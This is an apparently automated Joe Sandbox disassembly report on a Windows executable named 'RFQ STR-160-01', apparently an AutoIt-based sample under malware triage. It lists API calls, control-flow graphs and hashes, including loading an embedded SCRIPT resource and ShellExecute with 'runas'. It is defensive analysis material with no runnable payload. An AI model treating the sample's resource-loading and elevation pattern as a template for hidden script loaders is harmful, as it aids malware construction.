              • Opcode Fuzzy Hash: e37a80c56538e5e1b5326a6383199c12c19e108e699956209b4491270ed31606
              • Instruction Fuzzy Hash: DBA1846590A6D0DFCF21CB6D7D455997FA77B37300B0C789AD047BBB22D2A04A09CB62

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1378 5942a2-5942ba CreateStreamOnHGlobal 1379 5942da-5942dd 1378->1379 1380 5942bc-5942d3 FindResourceExW 1378->1380 1381 5942d9 1380->1381 1382 5d35ba-5d35c9 LoadResource 1380->1382 1381->1379 1382->1381 1383 5d35cf-5d35dd SizeofResource 1382->1383 1383->1381 1384 5d35e3-5d35ee LockResource 1383->1384 1384->1381 1385 5d35f4-5d3612 1384->1385 1385->1381
              APIs
              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,005950AA,?,?,00000000,00000000), ref: 005942B2
              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,005950AA,?,?,00000000,00000000), ref: 005942C9
              • LoadResource.KERNEL32(?,00000000,?,?,005950AA,?,?,00000000,00000000,?,?,?,?,?,?,00594F20), ref: 005D35BE
              • SizeofResource.KERNEL32(?,00000000,?,?,005950AA,?,?,00000000,00000000,?,?,?,?,?,?,00594F20), ref: 005D35D3
              • LockResource.KERNEL32(005950AA,?,?,005950AA,?,?,00000000,00000000,?,?,?,?,?,?,00594F20,?), ref: 005D35E6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
              • String ID: SCRIPT
              • API String ID: 3051347437-3967369404
              • Opcode ID: 2d8c62525f2b803845f6f0c430086ca160a551d8915d2c81e68847161f9bd247
              • Instruction ID: c58cc078028b7ab471cb884d86139706a82dc821f861ed61b9782f66d4059ae2
              • Opcode Fuzzy Hash: 2d8c62525f2b803845f6f0c430086ca160a551d8915d2c81e68847161f9bd247
              • Instruction Fuzzy Hash: 2D117C74201B01BFEB218B65DC48F6B7FBAFFC5B61F208169B40296250DB71DD019A20

              Control-flow Graph

              APIs
              • SetCurrentDirectoryW.KERNEL32(?), ref: 00592B6B
                • Part of subcall function 00593A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00661418,?,00592E7F,?,?,?,00000000), ref: 00593A78
                • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
              • GetForegroundWindow.USER32(runas,?,?,?,?,?,00652224), ref: 005D2C10
              • ShellExecuteW.SHELL32(00000000,?,?,00652224), ref: 005D2C17
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
              • String ID: runas
              • API String ID: 448630720-4000483414
              • Opcode ID: 0b5e7c4e076db28f0c3a58fadacd76968d04cbbca5f2e1cfb1012049d47b1b8c
              • Instruction ID: bca6f6ac0bc7eb734ce263fa3e499904aece981b3ef6e6cabe5fa014c51b917b
              • Opcode Fuzzy Hash: 0b5e7c4e076db28f0c3a58fadacd76968d04cbbca5f2e1cfb1012049d47b1b8c
              • Instruction Fuzzy Hash: C611B431108342AACF14FF64D8599BE7FE6BBE1351F48582DF542570A2CF658A0AC752
              APIs
              • lstrlenW.KERNEL32(?,005D5222), ref: 005FDBCE
              • GetFileAttributesW.KERNELBASE(?), ref: 005FDBDD
              • FindFirstFileW.KERNELBASE(?,?), ref: 005FDBEE
              • FindClose.KERNEL32(00000000), ref: 005FDBFA
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: FileFind$AttributesCloseFirstlstrlen
              • String ID:
              • API String ID: 2695905019-0
              • Opcode ID: 5a0ec0232fa3c942d4399bbabc1f8448952f4cd3a8da4c4a059dc0d5afede89b
              • Instruction ID: 83f76727a8920456fb2ad43d6dac1dd2f5305179a1a45f547e74eeff6681da28
              • Opcode Fuzzy Hash: 5a0ec0232fa3c942d4399bbabc1f8448952f4cd3a8da4c4a059dc0d5afede89b
              • Instruction Fuzzy Hash: D7F0A03081191897C3306B78AC0E8BE3B7EAE01334B104702F976C21E0EBB45E568AE5
              APIs
              • GetInputState.USER32 ref: 0059D807
              • timeGetTime.WINMM ref: 0059DA07
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0059DB28
              • TranslateMessage.USER32(?), ref: 0059DB7B
              • DispatchMessageW.USER32(?), ref: 0059DB89
              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0059DB9F
              • Sleep.KERNEL32(0000000A), ref: 0059DBB1
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
              • String ID:
              • API String ID: 2189390790-0
              • Opcode ID: 8304310bcbe0ba9fd46b0e33f79bef588173d1a2c13f13925a13600650887ce7
              • Instruction ID: fd9fc9c21d8c55fd616dd1301f1b95b6eee7b6f04adbe85205c80ed69c82075a
              • Opcode Fuzzy Hash: 8304310bcbe0ba9fd46b0e33f79bef588173d1a2c13f13925a13600650887ce7
              • Instruction Fuzzy Hash: 5942E370608782DFDB28DF25C848BAABFF5BF85314F14491DE49987291D774E844CBA2

              Control-flow Graph

              APIs
              • GetSysColorBrush.USER32(0000000F), ref: 00592D07
              • RegisterClassExW.USER32(00000030), ref: 00592D31
              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00592D42
              • InitCommonControlsEx.COMCTL32(?), ref: 00592D5F
              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00592D6F
              • LoadIconW.USER32(000000A9), ref: 00592D85
              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00592D94
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
              • API String ID: 2914291525-1005189915
              • Opcode ID: 50e64c40ef40528954a85c42292b5615404c5e9ac6c9e8ec7d4b62865add8762
              • Instruction ID: 764b2e77a9c169c269627127710262d6ef3ada593558c1c911531bd484167838
              • Opcode Fuzzy Hash: 50e64c40ef40528954a85c42292b5615404c5e9ac6c9e8ec7d4b62865add8762
              • Instruction Fuzzy Hash: C621F2B5D01718AFDB10DFA4EC89BDDBBB6FB09711F04921AFA11AA2A0D7B10540CF91

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 302 5c8d45-5c8d55 303 5c8d6f-5c8d71 302->303 304 5c8d57-5c8d6a call 5bf2c6 call 5bf2d9 302->304 306 5c90d9-5c90e6 call 5bf2c6 call 5bf2d9 303->306 307 5c8d77-5c8d7d 303->307 321 5c90f1 304->321 326 5c90ec call 5c27ec 306->326 307->306 310 5c8d83-5c8dae 307->310 310->306 311 5c8db4-5c8dbd 310->311 314 5c8dbf-5c8dd2 call 5bf2c6 call 5bf2d9 311->314 315 5c8dd7-5c8dd9 311->315 314->326 319 5c8ddf-5c8de3 315->319 320 5c90d5-5c90d7 315->320 319->320 325 5c8de9-5c8ded 319->325 323 5c90f4-5c90f9 320->323 321->323 325->314 329 5c8def-5c8e06 325->329 326->321 331 5c8e08-5c8e0b 329->331 332 5c8e23-5c8e2c 329->332 333 5c8e0d-5c8e13 331->333 334 5c8e15-5c8e1e 331->334 335 5c8e2e-5c8e45 call 5bf2c6 call 5bf2d9 call 5c27ec 332->335 336 5c8e4a-5c8e54 332->336 333->334 333->335 339 5c8ebf-5c8ed9 334->339 365 5c900c 335->365 337 5c8e5b-5c8e79 call 5c3820 call 5c29c8 * 2 336->337 338 5c8e56-5c8e58 336->338 375 5c8e7b-5c8e91 call 5bf2d9 call 5bf2c6 337->375 376 5c8e96-5c8ebc call 5c9424 337->376 338->337 342 5c8fad-5c8fb6 call 5cf89b 339->342 343 5c8edf-5c8eef 339->343 354 5c8fb8-5c8fca 342->354 355 5c9029 342->355 343->342 347 5c8ef5-5c8ef7 343->347 347->342 351 5c8efd-5c8f23 347->351 351->342 356 5c8f29-5c8f3c 351->356 354->355 360 5c8fcc-5c8fdb GetConsoleMode 354->360 358 5c902d-5c9045 ReadFile 355->358 356->342 361 5c8f3e-5c8f40 356->361 363 5c9047-5c904d 358->363 364 5c90a1-5c90ac GetLastError 358->364 360->355 366 5c8fdd-5c8fe1 360->366 361->342 367 5c8f42-5c8f6d 361->367 363->364 371 5c904f 363->371 369 5c90ae-5c90c0 call 5bf2d9 call 5bf2c6 364->369 370 5c90c5-5c90c8 364->370 373 5c900f-5c9019 call 5c29c8 365->373 366->358 372 5c8fe3-5c8ffd ReadConsoleW 366->372 367->342 374 5c8f6f-5c8f82 367->374 369->365 382 5c90ce-5c90d0 370->382 383 5c9005-5c900b call 5bf2a3 370->383 378 5c9052-5c9064 371->378 380 5c901e-5c9027 372->380 381 5c8fff GetLastError 372->381 373->323 374->342 385 5c8f84-5c8f86 374->385 375->365 376->339 378->373 389 5c9066-5c906a 378->389 380->378 381->383 382->373 383->365 385->342 393 5c8f88-5c8fa8 385->393 396 5c906c-5c907c call 5c8a61 389->396 397 5c9083-5c908e 389->397 393->342 408 5c907f-5c9081 396->408 402 5c909a-5c909f call 5c88a1 397->402 403 5c9090 call 5c8bb1 397->403 409 5c9095-5c9098 402->409 403->409 408->373 409->408
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID:
              • String ID: .[
              • API String ID: 0-1428149938
              • Opcode ID: c588b9fb0a7a2f9d4959cc73ddc378665d4dc476bd6f0ebb8b4986598e034230
              • Instruction ID: 1522cb8490a9cd9a4ebfffa4b32740fbc8380e9a4ec5e996f4bfe5215709f3d5
              • Opcode Fuzzy Hash: c588b9fb0a7a2f9d4959cc73ddc378665d4dc476bd6f0ebb8b4986598e034230
              • Instruction Fuzzy Hash: 22C1BC79A0424AAFDB119FE8CC49FEDBFB5BF49310F08409DE815A7292C7749941CB61

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 410 5d065b-5d068b call 5d042f 413 5d068d-5d0698 call 5bf2c6 410->413 414 5d06a6-5d06b2 call 5c5221 410->414 421 5d069a-5d06a1 call 5bf2d9 413->421 419 5d06cb-5d0714 call 5d039a 414->419 420 5d06b4-5d06c9 call 5bf2c6 call 5bf2d9 414->420 429 5d0716-5d071f 419->429 430 5d0781-5d078a GetFileType 419->430 420->421 431 5d097d-5d0983 421->431 435 5d0756-5d077c GetLastError call 5bf2a3 429->435 436 5d0721-5d0725 429->436 432 5d078c-5d07bd GetLastError call 5bf2a3 CloseHandle 430->432 433 5d07d3-5d07d6 430->433 432->421 447 5d07c3-5d07ce call 5bf2d9 432->447 438 5d07df-5d07e5 433->438 439 5d07d8-5d07dd 433->439 435->421 436->435 440 5d0727-5d0754 call 5d039a 436->440 443 5d07e9-5d0837 call 5c516a 438->443 444 5d07e7 438->444 439->443 440->430 440->435 453 5d0839-5d0845 call 5d05ab 443->453 454 5d0847-5d086b call 5d014d 443->454 444->443 447->421 453->454 459 5d086f-5d0879 call 5c86ae 453->459 460 5d086d 454->460 461 5d087e-5d08c1 454->461 459->431 460->459 463 5d08c3-5d08c7 461->463 464 5d08e2-5d08f0 461->464 463->464 466 5d08c9-5d08dd 463->466 467 5d097b 464->467 468 5d08f6-5d08fa 464->468 466->464 467->431 468->467 469 5d08fc-5d092f CloseHandle call 5d039a 468->469 472 5d0931-5d095d GetLastError call 5bf2a3 call 5c5333 469->472 473 5d0963-5d0977 469->473 472->473 473->467
              APIs
                • Part of subcall function 005D039A: CreateFileW.KERNELBASE(00000000,00000000,?,005D0704,?,?,00000000,?,005D0704,00000000,0000000C), ref: 005D03B7
              • GetLastError.KERNEL32 ref: 005D076F
              • __dosmaperr.LIBCMT ref: 005D0776
              • GetFileType.KERNELBASE(00000000), ref: 005D0782
              • GetLastError.KERNEL32 ref: 005D078C
              • __dosmaperr.LIBCMT ref: 005D0795
              • CloseHandle.KERNEL32(00000000), ref: 005D07B5
              • CloseHandle.KERNEL32(?), ref: 005D08FF
              • GetLastError.KERNEL32 ref: 005D0931
              • __dosmaperr.LIBCMT ref: 005D0938
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
              • String ID: H
              • API String ID: 4237864984-2852464175
              • Opcode ID: 7bc4cc3b52bce716dc9bdf51a0574c7393ec97ff25b26968ba006ffc64f81bf4
              • Instruction ID: 395751f7e8f8079bd069450aa213ae76b86b2145563d6d64119eebc30391e8f6
              • Opcode Fuzzy Hash: 7bc4cc3b52bce716dc9bdf51a0574c7393ec97ff25b26968ba006ffc64f81bf4
              • Instruction Fuzzy Hash: 62A11F32A001498FDF29AF6CDC56BAE7FA1BB46320F14115BF8119F3D1DA719812CB91

              Control-flow Graph

              APIs
                • Part of subcall function 00593A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00661418,?,00592E7F,?,?,?,00000000), ref: 00593A78
                • Part of subcall function 00593357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00593379
              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0059356A
              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 005D318D
              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 005D31CE
              • RegCloseKey.ADVAPI32(?), ref: 005D3210
              • _wcslen.LIBCMT ref: 005D3277
              • _wcslen.LIBCMT ref: 005D3286
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
              • API String ID: 98802146-2727554177
              • Opcode ID: 6bd11453bcc1bcc02d53907e7018a0f242f33390e4bfb0b7a0fbcc1280b5c87e
              • Instruction ID: f4d4a253e3155998088ace5003355d425ed067d9a965a2e58b7ccdbdfee597db
              • Opcode Fuzzy Hash: 6bd11453bcc1bcc02d53907e7018a0f242f33390e4bfb0b7a0fbcc1280b5c87e
              • Instruction Fuzzy Hash: B671A1715047029EC714DF69DC958AFBFE9FF95740F40182EF545A32A0EB709A48CB62

              Control-flow Graph

              APIs
              • GetSysColorBrush.USER32(0000000F), ref: 00592B8E
              • LoadCursorW.USER32(00000000,00007F00), ref: 00592B9D
              • LoadIconW.USER32(00000063), ref: 00592BB3
              • LoadIconW.USER32(000000A4), ref: 00592BC5
              • LoadIconW.USER32(000000A2), ref: 00592BD7
              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00592BEF
              • RegisterClassExW.USER32(?), ref: 00592C40
                • Part of subcall function 00592CD4: GetSysColorBrush.USER32(0000000F), ref: 00592D07
                • Part of subcall function 00592CD4: RegisterClassExW.USER32(00000030), ref: 00592D31
                • Part of subcall function 00592CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00592D42
                • Part of subcall function 00592CD4: InitCommonControlsEx.COMCTL32(?), ref: 00592D5F
                • Part of subcall function 00592CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00592D6F
                • Part of subcall function 00592CD4: LoadIconW.USER32(000000A9), ref: 00592D85
                • Part of subcall function 00592CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00592D94
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
              • String ID: #$0$AutoIt v3
              • API String ID: 423443420-4155596026
              • Opcode ID: 9a68db2132e01ee6f262230a01535a28a35fdece50031cd2f6c24cad0be85465
              • Instruction ID: 415cbf576130b97ae2abfdfad117d1e5e8c13ff93663cfb27d4fdf9188a616f8
              • Opcode Fuzzy Hash: 9a68db2132e01ee6f262230a01535a28a35fdece50031cd2f6c24cad0be85465
              • Instruction Fuzzy Hash: A0211A70E10354ABDB109FA5EC55A9D7FB6FB49B50F08101AE501BB7A0D7F14A40DF90
              APIs
              • __Init_thread_footer.LIBCMT ref: 0059BB4E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Init_thread_footer
              • String ID: p#f$p#f$p#f$p#f$p%f$p%f$x#f$x#f
              • API String ID: 1385522511-2545334469
              • Opcode ID: 559fe2b2c85304e61fb79247c7711dba433a6a80950d0ec814abc637a9e66ea9
              • Instruction ID: 2999c62484d7c524f4bb1e5aecd7b44417c3b57b8c8c20bb8af3cecb8567c048
              • Opcode Fuzzy Hash: 559fe2b2c85304e61fb79247c7711dba433a6a80950d0ec814abc637a9e66ea9
              • Instruction Fuzzy Hash: 4032D074A0020ADFEF14CF55D994ABEBFBAFF48300F148459E945AB291C7B4AD81CB91

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 758 593170-593185 759 5931e5-5931e7 758->759 760 593187-59318a 758->760 759->760 763 5931e9 759->763 761 5931eb 760->761 762 59318c-593193 760->762 767 5d2dfb-5d2e23 call 5918e2 call 5ae499 761->767 768 5931f1-5931f6 761->768 764 593199-59319e 762->764 765 593265-59326d PostQuitMessage 762->765 766 5931d0-5931d8 DefWindowProcW 763->766 770 5d2e7c-5d2e90 call 5fbf30 764->770 771 5931a4-5931a8 764->771 773 593219-59321b 765->773 772 5931de-5931e4 766->772 803 5d2e28-5d2e2f 767->803 774 5931f8-5931fb 768->774 775 59321d-593244 SetTimer RegisterWindowMessageW 768->775 770->773 797 5d2e96 770->797 779 5d2e68-5d2e77 call 5fc161 771->779 780 5931ae-5931b3 771->780 773->772 776 5d2d9c-5d2d9f 774->776 777 593201-593214 KillTimer call 5930f2 call 593c50 774->777 775->773 781 593246-593251 CreatePopupMenu 775->781 789 5d2dd7-5d2df6 MoveWindow 776->789 790 5d2da1-5d2da5 776->790 777->773 779->773 786 5d2e4d-5d2e54 780->786 787 5931b9-5931be 780->787 781->773 786->766 791 5d2e5a-5d2e63 call 5f0ad7 786->791 795 593253-593263 call 59326f 787->795 796 5931c4-5931ca 787->796 789->773 798 5d2da7-5d2daa 790->798 799 5d2dc6-5d2dd2 SetFocus 790->799 791->766 795->773 796->766 796->803 797->766 798->796 804 5d2db0-5d2dc1 call 5918e2 798->804 799->773 803->766 807 5d2e35-5d2e48 call 5930f2 call 593837 803->807 804->773 807->766
              APIs
              • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0059316A,?,?), ref: 005931D8
              • KillTimer.USER32(?,00000001,?,?,?,?,?,0059316A,?,?), ref: 00593204
              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00593227
              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0059316A,?,?), ref: 00593232
              • CreatePopupMenu.USER32 ref: 00593246
              • PostQuitMessage.USER32(00000000), ref: 00593267
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
              • String ID: TaskbarCreated
              • API String ID: 129472671-2362178303
              • Opcode ID: 8bef655d6beae34d7bb76c8ba0912ac0b3abd96451f20d970010549735191c11
              • Instruction ID: 25fc39f70a0218347fb45bacbf39104a8c1a891a3134a858c5cf47ebad04714d
              • Opcode Fuzzy Hash: 8bef655d6beae34d7bb76c8ba0912ac0b3abd96451f20d970010549735191c11
              • Instruction Fuzzy Hash: 89413535204605EBDF242B78DD1DB7D3E1BFB46350F081526F512DA2B1CBA18E41E7A1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID:
              • String ID: D%f$D%f$D%f$D%f$D%fD%f$Variable must be of type 'Object'.
              • API String ID: 0-4125818173
              • Opcode ID: 03754bdb6e260c084c37ce12cb488b9696910537044ded6774a39728c8eb45be
              • Instruction ID: 50119c3f23ea7af40da0ee2b6267a43a01ffdd1d0eb6bfbf0032601bf2b5e2c9
              • Opcode Fuzzy Hash: 03754bdb6e260c084c37ce12cb488b9696910537044ded6774a39728c8eb45be
              • Instruction Fuzzy Hash: 5DC29C71A00215CFCF24CF98C886AADBBB1FF59304F248969E946AB391D375ED41CB91

              Control-flow Graph

              • Executed
              • Not Executed
